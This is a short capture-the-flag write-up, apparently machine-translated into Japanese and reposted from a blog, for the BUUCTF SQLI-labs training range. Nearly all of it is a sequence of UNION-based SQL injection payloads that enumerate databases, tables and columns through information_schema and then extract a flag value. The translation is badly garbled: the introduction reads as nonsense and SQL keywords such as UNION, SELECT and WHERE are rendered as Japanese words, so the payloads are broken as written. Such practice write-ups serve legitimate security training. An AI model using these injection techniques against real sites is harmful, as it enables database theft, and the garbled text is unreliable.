Buuctf | SQLI-ラボ

これは[ヘクタール、はい、私はちょうど私の青、赤を愛し]フラグは、それがここに記録され、最高は再びプレーしている、訓練範囲をご提供することが、角度のためのフラグを見つけるために、趙マスターであり、


?ID = 1「:エラーが、この説明は閉じて使用することです 

?ID = 0' の組合は1,2、GROUP_CONCAT(SCHEMA_NAME)を選択からinformation_schema.schemata - +

 

 ?ID = 0' の組合がINFORMATION_SCHEMA.TABLESから1,2、GROUP_CONCAT(TABLE_NAME)を選択してここTABLE_SCHEMA = 'ctftraining' - +

 

 ?ID = 0' の組合がinformation_schema.columnsから1,2、GROUP_CONCAT(COLUMN_NAME)を選択してここTABLE_SCHEMA = 'ctftraining' とTABLE_NAME = 'フラグ' - +

 

 ?ctftraining.flagからID = 0' 組合1,2を選択し、GROUP_CONCAT(フラグ) - +

 

おすすめ

転載: www.cnblogs.com/chrysanthemum/p/11670935.html